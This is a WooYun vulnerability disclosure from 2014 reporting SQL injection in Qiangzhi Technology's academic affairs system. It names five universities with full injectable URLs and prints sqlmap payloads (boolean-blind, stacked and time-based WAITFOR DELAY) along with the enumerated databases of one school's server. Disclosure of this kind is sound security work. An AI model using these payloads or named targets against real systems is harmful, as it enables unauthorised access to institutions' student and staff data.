当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-053511

漏洞标题:强智科技教务系统存在SQL注入漏洞导致多校中枪……

相关厂商:qzdatasoft.com

漏洞作者: sdc1992

提交时间:2014-03-25 12:38

修复时间:2014-06-20 12:39

公开时间:2014-06-20 12:39

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:12

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-03-25: 细节已通知厂商并且等待厂商处理中
2014-03-27: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-05-21: 细节向核心白帽子及相关领域专家公开
2014-05-31: 细节向普通白帽子公开
2014-06-10: 细节向实习白帽子公开
2014-06-20: 细节向公众公开

简要描述:

强智科技教务系统存在SQL注入漏洞,多校中枪……

详细说明:

这个算是CMS吧?
中枪学校及注入点
湖南商学院:http://jwgl.hnuc.edu.cn/Public/ShowGGTZ.asp?GGTZID=317【这里】
北京城市学院:http://114.255.66.248/jiaowu/Public/ShowGGTZ.asp?GGTZID=218【这里】
焦作大学:http://jw.jzu.cn/jiaowu/Public/ShowGGTZ.asp?GGTZID=1155【这里】
河北交通职业技术学院:http://219.148.49.53/jiaowu/Public/ShowGGTZ.asp?GGTZID=223【这里】
湖北经济学院法商学院:http://218.197.80.9/jiaowu_fsxy/Public/ShowGGTZ.asp?GGTZID=105【这里】
使用智强科技教务系统的学校有很多,估计还有,懒得查了……
问题就出在这款教务系统带的新闻功能上!在新闻的URL中GGTZID字段没过滤,然后数据库就直接暴漏啦……

漏洞证明:

以湖南商学院为例曝个数据库名吧:

Place: GET
Parameter: GGTZID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: GGTZID=317 AND 7648=7648
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: GGTZID=317; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: GGTZID=317 WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2008
available databases [7]:
[*] jiaowusxy
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb


教务系统这东西,点到为止,我不继续深入了……

修复方案:

过滤……

版权声明:转载请注明来源 sdc1992@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-06-20 12:39

厂商回复:

此漏洞问题,我方2010年就给出了处理方案,如还有个别存在,是没有安装要求进行部署引起

最新状态:

暂无